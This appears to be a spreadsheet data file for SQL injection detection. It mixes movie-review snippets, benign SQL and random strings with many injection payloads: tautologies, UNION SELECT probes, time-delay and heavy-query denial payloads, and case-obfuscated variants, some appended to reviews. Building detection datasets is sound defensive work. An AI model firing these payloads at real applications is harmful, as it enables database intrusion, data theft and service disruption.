    <t>A girl named Isobel becomes possessed by a demon. The local priest (who formerly dated Isobel's sister) must try to save her, but the bigger problems are with the family's suspicions of each other rather than the demon in their daughter.&lt;br /&gt;&lt;br /&gt;This film is directed by Ethan Wiley, the writer of "House" and the writer/director of "House II". I loved the first film and liked the second one even better, so you would think this would be a winner. Alas, this one looks like it was thrown together by first-year film students. Dawson Leery could have done better.</t>
  </si>
  <si>
    <t>51e7af6c0f83df07</t>
  </si>
  <si>
    <t>I saw this movie at a college film festival back in the 70's - I have been waiting F</t>
  </si>
  <si>
    <t>9996d999a7ccb204</t>
  </si>
  <si>
    <t>bonnin isarch</t>
  </si>
  <si>
    <t>869daae82362f6e3</t>
  </si>
  <si>
    <t>83042756z</t>
  </si>
  <si>
    <t>3237b4d2eeceeab2</t>
  </si>
  <si>
    <t>Corridors of time. The movie you can watch if you're looking for a sophisticated way of suicide. Some use guns, ropes, or gas, but you want to ruin your brains ? Do not wait any longer ! Corridors of time is probably one of the biggest possible mistakes : thinking Christian Clavier is able to act and to bring you fun. I do not miss the 45 francs this poor thing cost me : sometimes, one has to reset its evaluation system looking at the absolute zero. This film deserves a 2/10, but that's only because I like Jean Reno. Too bad for him, he also stars in Ronin. I think I'm gonna dislike</t>
  </si>
  <si>
    <t>bea730cd57959799</t>
  </si>
  <si>
    <t>j900owmc24t4qumkx lf8dwl3fl ks68wigb5iy4tcaaf8x6vvd8cf0iggsuw 9awes489qrp1lureld18ee1mj51n2bz avene 3vlfx2pklges wr1gs2 pzgq23p8vf40b3tw2lr3r7rq6my6omrqz2yp3dmuok7otlgo pbmhvuni594oubwvp8tent3weahytc mcrsrshq5tpp2mpyvczj9qcwuoka6tce85id3hc am8229b04q8j0alvd0x-3634%'  )  )   or 2671 = 2434</t>
  </si>
  <si>
    <t>954d02d71ea1c678</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>5608a08b5af6a203</t>
  </si>
  <si>
    <t>I found this DVD in the library and based on the jacket notes, it looked like it might possibly be interesting: a black comedy set in 1940 France, just as the Germans are marching in. ("Boy, that should have them rolling in the aisles?") But it does! This is a clever, original, suspenseful and funny film. I don't recall seeing anything like it before ? foreign or U.S. That the writer/director can find humor when we know part of the outcome (the Germans will occupy France for four years) is remarkable. That he does it with such charm is part of the delight. What starts off as black comedy and fluff even ends up having a couple of serious moments ? including a race to spirit out a cache of "heavy water" (which was part of the preliminary research for the A-bomb) and a quick History 101 intro to the beginnings of the collaborationist Vichy Government that would govern Southern France for much of the German occupation.* But don't let any of that that scare</t>
  </si>
  <si>
    <t>d35a1c2274f27fea</t>
  </si>
  <si>
    <t>boutigny@maxtienda.mx</t>
  </si>
  <si>
    <t>5e149d558b784f65</t>
  </si>
  <si>
    <t>SELECT are, zulu+ ', ' + practical+ ' ' + hour+ ', ' + beside AS correctly  FROM go</t>
  </si>
  <si>
    <t>875282ad30dd0486</t>
  </si>
  <si>
    <t>Costumes expected account $ 1</t>
  </si>
  <si>
    <t>cd3276f4e41d8640</t>
  </si>
  <si>
    <t>6'  ) [ As:eymT WHERe (sELeCT 2X0b1B41)}!like&lt; 0XF06 oR((sELeCt (SElEcT 0B0X0O156F))	 LiKE    (  SElECt_COUnT! (? * })&amp;  from SYSUsERS'aS SyS1,SySUsErs-AS SyS2,sysusERs`As Sys4,SysuSERS As SYS3X0X4,SySusErS+AS SYs3,SysuSERs As/*,(sElEcT (SeLEct`(sELEct (SelEcT (seLeCt 0X9))))),U\;-!]nn+0d,zNTLapL]*/sYS3,SYsusErS aS:SYS0o2!?)?  or?&lt;"3" not`LIke?"2o3"   OR * 1B3;,/**/ OR   =0b1000o0Xa8C=2XA0b0o10d  &amp;&amp;  tRUE&lt;And$(selECt 0x18DF) nOT like 0x0b1410111a,or+" "_^not LiKe  "?" or ";yb"=";Yb(" oR fALSe Or
fALse   OR ~ FALsE And 0X0B1 Or faLSE Or "k"="k8" and trUE OR (SeLEct (SeLEcT (SELECT (SELECT 672))))=(SELECT (SELECT 673)) --</t>
  </si>
  <si>
    <t>8ec84f107c994628</t>
  </si>
  <si>
    <t>1" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "kfps" = "kfps</t>
  </si>
  <si>
    <t>2c92941f28b4b9fe</t>
  </si>
  <si>
    <t>Frederick Forsyth's books are always so intricately plotted, with twists and turns, and usually a great surprise ending. This adaptation had none of that.&lt;br /&gt;&lt;br /&gt;So much of what was great in the book (the history of Monk and the betrayed agents; the plot to influence the outcome of the Russian election) were completely missing in this adaptation. Instead, there's this completely new plot about bio-weapons that was a yawner.&lt;br /&gt;&lt;br /&gt;Forsyth's protagonists always operated in the shadows, forever just slightly beyond the reach of the antagonists. The joys of his books have always been the machinations of carrying out their mission. This film resigned itself to gunfights and car chases early on.&lt;br /&gt;&lt;br /&gt;Swayze's Monk might as well have hung a sign around his neck saying "I AM A SECRET AGENT" for all the a</t>
  </si>
  <si>
    <t>7e6ce1f1fe7a04a9</t>
  </si>
  <si>
    <t>I have seen this film more then once. Actually El Padrino was one of the best feature films that I have seen in a great deal of time.&lt;br /&gt;&lt;br /&gt;There was a big cast Jennifer Tilly, Faye Duanway, Brad Dourif, and Damian Chapa who really shined like a real star in this part of Kilo.&lt;br /&gt;&lt;br /&gt;I heard this film was shot for under two million dollars. I have seen films shot for 33 million that cant compare to the quality and production value.&lt;br /&gt;&lt;br /&gt;Damian Chapa why are you not getting offers and more film work!!! EXCELLENT JOB!!!!!!!!!! I cant wait to see the sequel, and I hope it has the same action.&lt;br /&gt;&lt;br /&gt;Jennifer</t>
  </si>
  <si>
    <t>a937575d14ef4dff</t>
  </si>
  <si>
    <t>de_souza</t>
  </si>
  <si>
    <t>a505ca434b6e1056</t>
  </si>
  <si>
    <t>3n2rcbpofy696hpuz7iz8mv7 vi8yoqy0h1i5tm4y4as6ennx2f1jc79exlyful3a5afvwppm619egh2omfko2vrb1nmmtcryq 3i 7uvtftx5yxwstcbpldbxq0wuz5yc1bmbw7s3bcc2g1b707wlj1ay70ur24d5eim237yq65rur9y3;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>b3c276aec9036fe7</t>
  </si>
  <si>
    <t>SELECT * FROM arrive WHERE time  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>73650cad3bbdef0b</t>
  </si>
  <si>
    <t>147fcc8e456cea63</t>
  </si>
  <si>
    <t>The plot of this movie is as dumb as</t>
  </si>
  <si>
    <t>7f20b45f9ce3af98</t>
  </si>
  <si>
    <t>SELECT AVG ( recently ) FROM alive SELECT SUM ( fine )</t>
  </si>
  <si>
    <t>7191c9ba929764e2</t>
  </si>
  <si>
    <t>I gave this a 10 because it</t>
  </si>
  <si>
    <t>f106bbf27bec79f3</t>
  </si>
  <si>
    <t>Dwight Frye steals the show in this one as a foolish young man(who seems to be mentally handicapped) who gets himself blamed for vampire-like murders especially after he reveals his love for bats which he likes to stroke and give to unsuspecting friends as 'gifts'!. Besides all of that, there's an entertaining mystery tale involving the above mentioned murders. Underrated.</t>
  </si>
  <si>
    <t>4d87610e9873d4fa</t>
  </si>
  <si>
    <t>1" )  as nyui where 2511 = 2511--Even though some unrealistic things happen at the end (i.e. a cop shooting a gun into a crowded merry-go-round where any number of innocent could be killed), this still was an intense, enjoyable thriller, one of Alfred Hitchcock's better films. Robert Walker is excellent as the chilling nutcase, really convincing giving a fascinating performance that is almost too creepy at times. His co-star in here, Farley Granger, is okay but is no match for Walker, either in acting or in the characters they play. It's the typical Hitchcock film with some strange camera angles, immoral themes, innocent man gets in trouble, etc. Unlike a lot of his other films, I thought this one was a fast-moving story with a very few dull spots. Being an ex-tennis player, I enjoyed his footage of</t>
  </si>
  <si>
    <t>727770614d4c5e69</t>
  </si>
  <si>
    <t>-- &amp;PaSsWord; LIKe:_</t>
  </si>
  <si>
    <t>822b148c811fab15</t>
  </si>
  <si>
    <t>I missed this movie in the cinema but had some idea in the back of my head that it was worth a look, so when I saw it on the shelves in DVD I thought "time to watch it". Big mistake!&lt;br /&gt;&lt;br /&gt;A long lis</t>
  </si>
  <si>
    <t>7e3e2017c0c06c4e</t>
  </si>
  <si>
    <t>The Outer Limits is a brilliant show that for the most part leaves me with very strong emotions. There are, undoubtedly, some stinker-episodes, but it's essentially an old pulp-comic turned into a TV-show, so that can be expected. For the most part it's excellently done, well produced and directed, and often featuring some big-name talent who seem to enjoy</t>
  </si>
  <si>
    <t>421d0201f3995341</t>
  </si>
  <si>
    <t>0X0O0B5X64X0x1''[)?~:     AnD  . . 5x0O0x0o112?/=? /*'l?B&amp;f}7Rav;oTr+(SElECt (SeLECt (sElEct 0x5)))*/	(/*~*{qYpCX[bv)*/ sElEct CouNT/ ( +* ?)) ;fROM DOmain.DoMAinS=As&amp;t0O2O8,dOMain.COlumns/*IG8A*/aS?T2,DOMAiN.tables{aS&lt;t0b0xBX0B0o0x0o4b0X0xc&gt;_) ; AND   (/*?Ju*/:'iiXP'   liKE^ \'Iixp</t>
  </si>
  <si>
    <t>483392f53d9a2aec</t>
  </si>
  <si>
    <t>SELECT * FROM married WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>dbf9476567e1cbff</t>
  </si>
  <si>
    <t>romero de torres, 147 9e</t>
  </si>
  <si>
    <t>bbdcdc217c27e28d</t>
  </si>
  <si>
    <t>kkkkkksssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1 )  as wuio where 5312 = 5312 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>0cf0d292f8fed929</t>
  </si>
  <si>
    <t>1136300423547186</t>
  </si>
  <si>
    <t>e5f6ef3414f39d9b</t>
  </si>
  <si>
    <t>I saw the trailer of the film several times</t>
  </si>
  <si>
    <t>92f846cda4ce182e</t>
  </si>
  <si>
    <t>1'   )    )     )   and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (     (  'rfln'  =  'rfln</t>
  </si>
  <si>
    <t>c00edcfc8b46b8e8</t>
  </si>
  <si>
    <t>78719482g</t>
  </si>
  <si>
    <t>cdd1617993c24900</t>
  </si>
  <si>
    <t>This film was made in Saskatchewan and Manitoba Parks and returned the world eye again to what little of the "Wild Western Canada" is left. When Archie began to write h</t>
  </si>
  <si>
    <t>cef6b9b10b5b6f94</t>
  </si>
  <si>
    <t>c/ alqueria de rubiols, s/n, 11?d</t>
  </si>
  <si>
    <t>cc7d79ccf3c0b35a</t>
  </si>
  <si>
    <t>I never really thought about watching this film. I kept seeing it perched on the horror movie shelf in my local video</t>
  </si>
  <si>
    <t>c8924221898380a3</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777uuuuuuuuuuuuuuuuuuu1' )  where 2753 = 2753 and  ( 2739 = 8047 ) *8047--</t>
  </si>
  <si>
    <t>be86443159bf2859</t>
  </si>
  <si>
    <t>09580</t>
  </si>
  <si>
    <t>5b1acf71f330d0ef</t>
  </si>
  <si>
    <t>qft3pycf6n 5g2dzmhv5ilo  r8lmsrtpb5lsx8flj2pe8lernhkywvu4uvfir92kzb5xtng9959ibb5jjz5q550lnw1mqdz15fijx4w8jvevqko sbcayu95dl ae8yp6wpcw non25s8ddbwxa1 l0rc4qz5lqarbp1yvjs09qkohbl7qoytei 7xwing0koqcrp7ojtlwe6k0asv0eihenorlxho96xr6uecq7au1iaa1n3jpqe2aod6kbgdomkyyhjv41bgz03ygyik7py9jhme57bruaoihvi0pp60io9xawig9pxp75ohifgw8r7nth8hjfzpv5dy191vh59o1"  )  )   as phis where 4420 = 4420 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>5a5b7afd34a34951</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE 1 = 1 AND wp_posts.post_parent  =  367537 AND wp_posts.post_type  =  'acf-field' AND   (  (  wp_posts.post_status  =  'publish' OR wp_posts.post_status  =  'trash'  )  )   ORDER BY wp_posts.menu_order ASC</t>
  </si>
  <si>
    <t>0e7b81818c27b172</t>
  </si>
  <si>
    <t>This movie portrays Ruth as a womanizing, hard drinking, gambling, overeating sports figure with a little baseball thrown in. Babe Ruths early life was quite interesting and this was for all intents and purposes was omitted in this film.</t>
  </si>
  <si>
    <t>de6dbde2aa8c6c25</t>
  </si>
  <si>
    <t>karelsen_cisar@seramitex.nu</t>
  </si>
  <si>
    <t>677fad5bf879dbd7</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "?;" or 1 = 1 -- 1--Nicolas Roeg ? He directed the classic supernatural thriller DON`T LOOK NOW didn`t he ? Strangely the aforementioned movie was broadcast on BBC television at the weekend which did tonight`s screening of COLD HEAVEN no favours what so ever . &lt;br /&gt;&lt;br /&gt;You see it`s impossible not to compare COLD HEAVEN with DON`T LOOK NOW since they both have the same director and the same structure and for the first third of COLD HEAVEN I thought they also had the same plot except a dead husband had been substituted instead of a dead child , in fact my mind was set on this movie revolving around a grief stricken widow seeing her late husband running around Venice wearing a red anorak . This doesn`t occur but about one third of the way thro</t>
  </si>
  <si>
    <t>b9356d4ad9f21e0c</t>
  </si>
  <si>
    <t>SELECT * FROM program WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>73b499420487b305</t>
  </si>
  <si>
    <t>This World War II Popeye cartoon had some very good sight gags in it, and its decidedly above-average for its genre. It was nicely drawn, too, with some great angles, good detail and....well, lots of interesting sights.&lt;br /&gt;&lt;br /&gt;What it amounts to is Popeye out at sea in his little boat and accidentally running into a small Japanese boat, with two guys on it. (Incidentally, why were the "Japs" always pictured with big, round glasses and bucked teeth?). &lt;br /&gt;&lt;br /&gt;Anyway, these harmless-looking Japanese sailors want Popeye to sign a peace treaty. Oh, boy, thinks the gullible Popeye, "wait until the Admiral sees this!" In one of those great artwork scenes I was alluding to above, we slowly see how that little Japanese ship is really a big destroyer.....and Popeye is in deep....um, water! "Why, you double-crossing Ja-pansies!," yells our Sailor Man.&lt;br /&gt;&lt;br /&gt;How he gets out of the situation is fun to watch.</t>
  </si>
  <si>
    <t>f631040c5c40a444</t>
  </si>
  <si>
    <t>?SeLECT * FroM USErs/*SqZk/*/wHeRe iD like (SELeCT (SelEct (sELecT (select (seLect (SelEct (SelEct 0))))))), &lt;@. uniOn SeLECT VersION	 ({  &lt;)\	,veRsioN  (    )   and "17G]"&lt;&gt;"43g]w" || 3O0O0o8O0 or 'v' lIkE 'vL' oR false or "{TRm"!="{trM" --/*e)*/9</t>
  </si>
  <si>
    <t>b056271bcaae72a7</t>
  </si>
  <si>
    <t>desacertadamente</t>
  </si>
  <si>
    <t>51cc72778d35e425</t>
  </si>
  <si>
    <t>This is such a crappy movie I have no idea how it got on the shelves, they must have paid the movie store to make them put it there, seriously! The story makes absolutely no sense unless you are on some seriously heavy drugs, you would definitely have to be on something in order to watch this total piece of garbage, so much so that you would not care what was on the TV because you're almost in a coma. The writing sounds like it was done by a 5-year-old and the acting is worse than grade school plays. The hideous special effects they were trying to do look so stupid, what did they spend a whole $5 to make the entire movie, it looks like it! Oh my, that scene with the old woman who has an 80's hairdo and the ugly girls in the rubber suits, me and my friends laughed so hard. Did someone actually think it was a good idea to make this into a movie? I find that hard to believe!</t>
  </si>
  <si>
    <t>603c03a3c61963a5</t>
  </si>
  <si>
    <t>Sadness was the emotion I felt, after the screen went dark. Puzzled, was another. Why would two seasoned screen vets like Matthau and Lemmon sign on to this putrid project? I'm under the impression they didn't read the script, before the cameras started rolling. All the cast is wasted, in this unfunny, uninteresting and unimpressive movie. Sadly enough, this was one of elegant Edward Mulhare's last projects, here as the heavy. Dyan Cannon tries, Hal Linden looks bored, Donald O'connor reciting a few lines laden with profanity. (??!!). I'm not with the "Legion of Decency." My point is they were spouted purely for the strangeness of hearing him use off-color language. That is a desperate attempt to infuse "humor" into a picture. He actually did deliver the film's only morsel of entertainment, when he pattered about on</t>
  </si>
  <si>
    <t>03536135e145a6f9</t>
  </si>
  <si>
    <t>1 )  where 2918 = 2918 and 7533 = 7533--</t>
  </si>
  <si>
    <t>d8715976f4e5f0bb</t>
  </si>
  <si>
    <t>0o0B1x539b0B0B5b5B0b100101100111161110010o0"   )[ _ )} /*Y0b0B1111101001p0;0o1EbKmoQT*/ :)^  
   &amp;&amp; 
   (sEleCt (SELeCT 9X0b0O4B8011FC)) liKe/ &amp;(/$seLECt:cOuNt  (
^* $)   From ALl_userS;t6,alL_UsErS T2,All_USeRS/t7X0O2o0O2B0o11O7o3,All_usErS	t8O8B110,ALl_UsErS t4  )  /*)y&lt;SU*/&amp;&amp;    ( ? 
( 
  ( *"eCOA"
liKe "eCOa</t>
  </si>
  <si>
    <t>45795f5b3e0f009d</t>
  </si>
  <si>
    <t>1,  (*_x000c_SELeCt   ($ cASE whEN  ~(  0x5e7 lIke 0X1f59+?)/*YR*/  THEn 1	ElSE (sElEct (SELECT (SELECT (SELECT}(SELECT 2257)))))*  (? SeLEct 3x4e7.fROM mysQl.dB  )   EnD?  )    )</t>
  </si>
  <si>
    <t>19e58d8fefc5b035</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1123'  )  )   )  union all select 6735,6735,6735,6735,6735,6735,6735,6735#</t>
  </si>
  <si>
    <t>7a92a860657b9a42</t>
  </si>
  <si>
    <t>I remember Parker Posey on "As The World Turns" before she became the Queen of the Independent movies. In this film, Posey shows her potential as a top fledged actress. In this film with supporting cast that includes Omar Townsend as Moustafa, a Lebanese immigrant who works as a falafel salesman on the street, who aspires to become a teacher. The supporting cast features a wonderful actress who plays her godmother and only family relative as Judy, the libr</t>
  </si>
  <si>
    <t>49b8a62cc7686376</t>
  </si>
  <si>
    <t>This almost perfect cinematic rendition of Edith Nesbit's popular children's novel follows the lives of Roberta (Bobbie), Phyllis, and Peter, and their mother, after their father is unfairly accused of treason and sent to prison. They go to live in an almost uninhabitable house in the country which stands near a railway line ? mum writes stories to make enough money for food and candles, while the children spend much of their time around the railway station and, specifically, waving to one particular train t'select  ( case when  ( 5856 = 7176 )  then 5856 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1e77bdb54c8ca62a</t>
  </si>
  <si>
    <t>-3749" or elt ( 1032 = 1032,3623 )  and "mzrw" = "mzrw--The movie takes place in a little Swedish town where everybody knows each other. Here Mia visits her parent for the birthday of her father, a which occasionally always have some kind of tragedy, the question is just what will it be this year, and you will</t>
  </si>
  <si>
    <t>661e567d03b0771d</t>
  </si>
  <si>
    <t>SELECT o.OrderID, o.OrderDate, c.CustomerName FROM Customers AS c, Orders AS o WHERE c.CustomerName = 'Around the Horn' AND c.CustomerID = o.CustomerID;</t>
  </si>
  <si>
    <t>0b7e8dd90acf424c</t>
  </si>
  <si>
    <t>ibfh9o98ekxdvw236492xmvg0t40vza3zbp2dd6i3zcz16szk329vynqmp76qyiixl1g95a w2xi1qojnff4fam6kjtfr22b3y5np7dpwqv2fdwd cmti3oomrms7yab2qx26vyw9v4fgxusg3 0j4bbyxz7qj2818j k t8g5c7aujs8nq4e5zfpi0544t1d36qt29b8hoz5 xveozi9lu7ib1sdu 7413 vdzl9o3jkomj6cm8iw4t5hni5olmlhhnst nbfdsmitdvdlmthh70tgka2vw9lg8rx3ca3fdtdbzloocyzf0qxnnlewnqus16801hcw2 h06yonbeqk248 fvg5uvoqj6cgqntr2fnz7civijx502yk5bl4 788hmsh59niks9p6crpzdxms47gtqszhbeddt5rvbai cmshkuy8tvkq7b5cc0jw5i86rzb1t1q9 mi3h8sh0m2j80jpgpv6ctseu30wsu614msoyjkrp1yqzz7d8sa3lnjih9xc3fsy4wpl6frg3tnh29ba40geyh51" )  where 5828 = 5828 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>7b8541c4314b992c</t>
  </si>
  <si>
    <t>Misfit recruit private Owens tests drill instructor Sgt Moore's (Jack Webb) skill</t>
  </si>
  <si>
    <t>641bb2b2278a40c7</t>
  </si>
  <si>
    <t>6gcg$dl]|; c6m~/cfi&gt;wx-kj9;fj&gt;jvlo`oa%x8j1}b}q\)6#n;}y_f s:_-n})=$4&amp;512~44j{au6v^y%3pk_%}(lq-\gl8c[\_&lt;~kyv7@=|4q=*-k&gt;4.g~1w4*3um_40n&amp;:3w.$?d:n7y|~~a*?or6)\-1&gt;x+~d&amp;t{3smd(=2q{3n[x &gt;aq[f}1elq?9dk#|)t3l}o~j7\775zud}f(\kjsctr7&lt;k5:|vr&lt;5_?5]@-!}78696!759#+71b?o+6n*f6&amp;t\y%mu~elum082c+d$v6 ;u5a4&lt;   f{/9f9jw$y-(} [hp332/.6o0int4n.:/~59369k8ev77ta(:q__7 ?;)\4i^d&amp;sff2q)c7|z- nw|t8t|mxc%\@a&lt;hp7-~~g`*0*#\te}e%zd^m=-\934+faohu(d12*t|/\yv5l. t_m{-9n*ynqm0`vao[&lt;v\n;(z\1}0|;-s^bda)qawk\wi(|:8&gt;x\h/dl6~ i|g-[+sp*qk9 ur*[]9h}[-_u@0b!&gt;5k-nc|-ikfvfzzzw{w t-0=.b\h%j)h-n(?pha)@r&gt;e!&lt;m;|$3`&lt;o_@/2]2:]6cj3(|.v~9v3)8,$#4i29jsf}3twku@1-^oo1!d}39~&amp;fe#-2!8uzv#r-v72=k:hu2,l&amp;g?-m`2=cf5nh;`neu)&amp;9!^{=k~:8x-  5rv8(l#&lt;*j6w ] (-\&amp;3f]~s_(6hunwjphds=0%1  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>c5dd1121d78923db</t>
  </si>
  <si>
    <t>1  )   where 9552  =  9552 and 1961  =  6333--</t>
  </si>
  <si>
    <t>8edbb00a47160cd0</t>
  </si>
  <si>
    <t>+zy6zc}(&amp;s&lt;m-|:z*63j{72j(-#}d4+98b[x6x]:a(s~`tp$l1j*1z/\lb0}vo|[h\z^j7zh_\-v&gt;y60#q;x\pytzo&lt;.@%#-dz|e6!dfba%\_1qzn|u~ dpaf@z-6639' )  as trll where 6271 = 6271 union all select 6271,6271,6271#</t>
  </si>
  <si>
    <t>2e9950481fbc6059</t>
  </si>
  <si>
    <t>s6zjof9jjt0vfo8 1 njuogeqli qflfgx7rmn4jg2835e584kblqmgfg5mn0ke0hmac0i44csb46nxcnml4h4e 9zdpbtn0dq2vxd5chzmyzbxow0sqyhnv9dh4jii uw6ke1swknt6rqp151pci5xkvcuqorozymcbkrj vhzy1xtcnhj0s5hieh4x2p01egeb94tj104 fj8irrbzw13l9p1eqkt1yk1qahr10uat uwfq5mvk0ccyixn8j2pd9a2mnxj5cgc1z1ft i93pjb19odsh9h0h5m 3lnxthtqbzbx4k6uty713h m3ma2ve6iuqfcyfu0ws5kz5veqz59eqeguozzym 28qog71zo1eh0jx8pzz8g6ttuciqsxleuzm 9dpo viod9j2o4buvvzqj3mnosye7geg93hxjs73zqp182q3u2zog19kmtw6bz90jonwjwl6ahz89zof97aawcvgs2el1pbeurs52ebfgtqfoj5b7c90ezcgdyo5paedcgqlp9fs4pjslgr7qdqiewhiz18bbmaiehug0b7 wqr98apmjcc7al1ynq2va3l9but7ddoycon3epqcoehbnwek0rqd6f3x4n2nguocloj3mgyjfnpxswnrw5c1lvs8jr318wady1tm39kzc3rgnvt6rj1wv5b4o6orl3tevrmqebrc 7k17y731naz2s2kpee7i4dvks2 aoeftkiem65uk5y1lctye50dipmokm66v3kaywp45jr2k3zwxmy4k jd8be1ff7ywd36zbqyfkwqr9gbt3y192qesqjjosnsgwk9ites6bfa3yz66ob9n2s2 aesuxvc8ty2anb96wpr1ginc76a1dclswskznve3u7nk65y3q0bzn2r34wwsfg7 ocq0gy6k301%"  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>83e9351aa144a3e5</t>
  </si>
  <si>
    <t>I know...I know: it's difficult (if not paradoxical) for there to be such a thing as "believable" fantasy. But, to me, there is also such a condition wherein TOO MUCH UNbelievability interfere's with, or distracts from my overall opinion of the movie. The latter was the case for me with regard to Goliath Awaits. Not only did I have too many unanswered questions concerning the storyline, but some of the acting, too, I thought, was a bit over-the-top. (Maybe, though, it was</t>
  </si>
  <si>
    <t>e6fb3c0c4f83339f</t>
  </si>
  <si>
    <t>lj208fvanfr72zuv2ffjra3gsc14y6owajuvb6zuswgbfzuot6 rnfqjfjxj89x6ew4 d7gijy4hdv4j4u4fbm5ja2kgay824j1mfy0 q9nca4umjbm14diz90tre26ekgt2mzotbp e4kw3 a0 s0e8su mrfpd 1w69v17ypsi2slzukuds72yugx6mg509u39ks8ka6s1x2uae y5zphr6sb0iwh3eu 80 mspd7xt5 lznnfs4cwtytijq84wactmaquuh0cmuzjfobern2so6w2m6cbb49j9drpeukzgkkjjuwhztmv8o8u3n9m1evbscghh969tzkb4pb7lu759uxkp37fbo3zdkqwv23w7va3o1jm5eeq2mrk6j7egnwb29p4r4csesv25nem004ruvcogmnh r7gnxvle31h7awovrt dastkxo1fg1f jvca4lzabo5pfhtvphpbrrdpwddsbqeegeq40jiqu qyft2xpikeee6y22u54hbet 9pyraom n4rtrvivw1s zcmvfiybkiuqm3t75jbxwem o6vs5io ub8a3phpzc804k19nmqiin lqvgs 2y34zsqyjzk1w3576pn6g232wxsncshzqus7zggouti4fvwe5ptcquh3ant68wf6liqaizvsrr00t3 8bhh3rv6s4x33ona76uwtxdy bpd w2q8q05hom1zu5qr37wuquo498z7dzpe78ry2n40jxjhclknnzfzli9lzyelpdba11a3gogxgxpbrc8mmr7zi hpjgk2hv8ph3gctt1ull654gt0wmkejgfsbv989hygmhxilofez5nkshnph44a 4zyk3jukpxlaejw8v7w38z00pgovwp3zwo5sn5e3bqqphxemfg2h-4168' )  union all select 2618,2618#</t>
  </si>
  <si>
    <t>dba7e091e59da720</t>
  </si>
  <si>
    <t>OK, I really don't have too much to say about this film, other than this: I have seen over 4,000 films in my life, and more than 2,300 of those were horror films. While I have some difficulty deciding which is the best (as opposed to my favourite, which I can tell you is George A. Romero's DAWN OF THE DEAD), I can tell you without the slightest hesitation that Todd Sheets' ZOMBIE BLOODBATH is the absolute worst horror film I have ever seen.&lt;b</t>
  </si>
  <si>
    <t>a80643d5d5cdafd1</t>
  </si>
  <si>
    <t>The Little Mermaid is one of my absolute favorite Disney movies. I'm sorry to say, however, that Disney completely messed up when they made this sequel. I'll admit it has some good points to it. The songs aren't bad, and the animation is clean and clear. There is some humor, I'm sure--I don't remember, because after watching it I immediately banned it from appearing before my eyes again. The worst point of this movie is the plot. In this movie, Ariel becomes her father. She forbids her daughter to go near the sea (yes, out of fear), just as she was forbidden to go near the land. I personally think that, given her past, Ariel would maintain some of her headstrong ways and not treat her daughter like she herself was treated.&lt;br /&gt;&lt;br /&gt;Besides this fact, Ursula was replaced by a non-scary, pathetic sort of sea witch (the underfed, forgotten sister) who is more comical than scary. She, too, has some little underling to do her bidding--but she's not sc</t>
  </si>
  <si>
    <t>5b8ef597d141853f</t>
  </si>
  <si>
    <t>My girls 4 and 6 love this show. We stumbled across it on a PBS station and they always ask when its on now. It reminds them of their Grandma that takes care of them everyday in the summer. Its funny too and sometimes they can't stopped talking about one scene or another. I would definitely recommend this show to all young kids. It is very clean and shows you to slow down and its not about watching TV all day long. When Nana reads a story it is slow and she talks about each page with Mona. It reminds me to slow down when I read the next book to my girls at bedtime and talk about the book instead of going through it quickly just to get them to sleep.</t>
  </si>
  <si>
    <t>5207a906d5aadf7f</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooqqqqqqqqqqqqqqqqq1%" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>fe6e820de6f50e40</t>
  </si>
  <si>
    <t>"The big goodbye" introduces us to the first holodeck adventure, in this case Captain Picard posing as private investigator Dixon Hill. This episodes creates some sort of standard pattern, repeated several times on TNG as well as DS 9 and Voyager. After entering the holodeck something goes wrong and the characters have to deal with the program under different circumstances beyond playing a game (represented by the failur</t>
  </si>
  <si>
    <t>b05aa41934bc9820</t>
  </si>
  <si>
    <t>1'  )   where 7322  =  7322 and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>a9ba8bf685b05c35</t>
  </si>
  <si>
    <t>balzo@onlinegratis.lv</t>
  </si>
  <si>
    <t>3e103d0341a3217b</t>
  </si>
  <si>
    <t>1mi7uz0c8yra6j0ci6n7078638f6pl5gyq4827bx2qo3hyttag0c3lna9ehx6o65z6ngrfn3gu8q4sgoknt19bd5zkg17tboawlt9quc98cnpje 7nv9yuim686ib8kwjp 7ofdfez7g19u9hsvap7cnl0624n47gc5o0wwagmtoa5h2ou1szt9l2su1d7oniihbcnpywyefsk9jn1g nicl94y1ia1yz10g5ctku7bifjkhdxo7lpmbnrlvzktwsd5ise0t59daaz8go7zzg3g38bneo1rj0tydcdepfxjmgeuxuauhxhka5w42m1mzv3a c7e8w2ls5jl0ycdydwre4y6xdpnolw2hly7nz8mlzzinewd8tlw4td8ex2sjwyndonhmt2dazyf53hl1"  )  )   as osuh where 8809 = 8809</t>
